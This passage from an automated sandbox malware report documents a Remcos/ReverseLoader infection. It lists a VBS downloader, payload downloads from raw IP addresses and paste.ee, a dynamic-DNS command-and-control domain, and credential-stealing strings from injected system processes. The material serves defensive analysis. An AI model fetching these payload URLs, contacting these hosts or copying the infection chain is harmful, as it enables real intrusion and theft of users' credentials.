.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.dotnetfullnamecreatordnlib.dotnet.emitnativemethodbodydnlib.dotnetfiledefuserdnlib.pemachinednlib.dotnetarraysigbasednlib
Source:	Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1421000865.0000000006F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.iofilesectiondnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.pdb.managedpdbexceptiondnlib.dotnetleafsig source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrow source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1421000865.0000000006F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrowdnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheaderdnlib.dotnet.mdrawmodulerowdnlib.dotnetimdtokenprovidermddnlib.pervadnlib.dotnet.writermodulewriteroptionsbasednlib.dotnet.pdb.dssisymunmanagedwriter2 source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp

Spreading

Yara detected VBS Downloader Generic

Source: Yara match

File source: C:\Windows\Temp\nonordinary.vbs, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	12_2_004090DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	12_2_0040B6B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	12_2_0041C7E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	12_2_0040B8BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0044E989 FindFirstFileExA,	12_2_0044E989
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	12_2_00408CDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	12_2_00419CEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	12_2_00407EDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00406F13 FindFirstFileW,FindNextFileW,	12_2_00406F13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	12_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_10006580 FindFirstFileExA,	12_2_10006580
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0040B477 FindFirstFileW,FindNextFileW,	14_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	15_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	16_2_00407898

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

12_2_00407357

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2047750 - Severity 1 - ET MALWARE Base64 Encoded MZ In Image : 104.168.7.38:80 -> 192.168.2.5:49721
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49723 -> 185.208.156.45:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49724 -> 185.208.156.45:14645
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 104.168.7.38:80 -> 192.168.2.5:49721
Source: Network traffic	Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.245.191.88:80 -> 192.168.2.5:49722
Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.245.191.88:80 -> 192.168.2.5:49722
Source: Network traffic	Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 172.245.191.88:80 -> 192.168.2.5:49722
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.245.191.88:80 -> 192.168.2.5:49722

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 23.186.113.60 443

Source: global traffic	HTTP traffic detected: GET /xampp/sv/ENCRYPTION01.jpg HTTP/1.1Host: 104.168.7.38Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /660/wearereallyniceloverwithgreatthingsonthatkissinggirlonme.txt HTTP/1.1Host: 172.245.191.88Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 23.186.113.60 23.186.113.60
Source: Joe Sandbox View	IP Address: 104.168.7.38 104.168.7.38
Source: Joe Sandbox View	IP Address: 172.245.191.88 172.245.191.88

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: SIMPLECARRIERCH SIMPLECARRIERCH

Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.38

Source: global traffic	HTTP traffic detected: GET /d/h0hNZ9qO/0 HTTP/1.1Accept: /Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/sv/ENCRYPTION01.jpg HTTP/1.1Host: 104.168.7.38Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /660/wearereallyniceloverwithgreatthingsonthatkissinggirlonme.txt HTTP/1.1Host: 172.245.191.88Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: recover.exe, 0000000E.00000003.1404846311.000000000312A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: .google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: recover.exe, 0000000E.00000003.1404846311.000000000312A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: .google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: CasPol.exe, 0000000C.00000002.3708800960.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000010.00000002.1392482413.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: CasPol.exe, 0000000C.00000002.3708800960.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1392482413.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: recover.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: qwertyuioplkjhgfdsazxcvbnm.ydns.eu
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	12_2_0041696E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	14_2_00409E39
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	14_2_00409EA1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	15_2_00406DFC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	15_2_00406E9F
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	16_2_004068B5
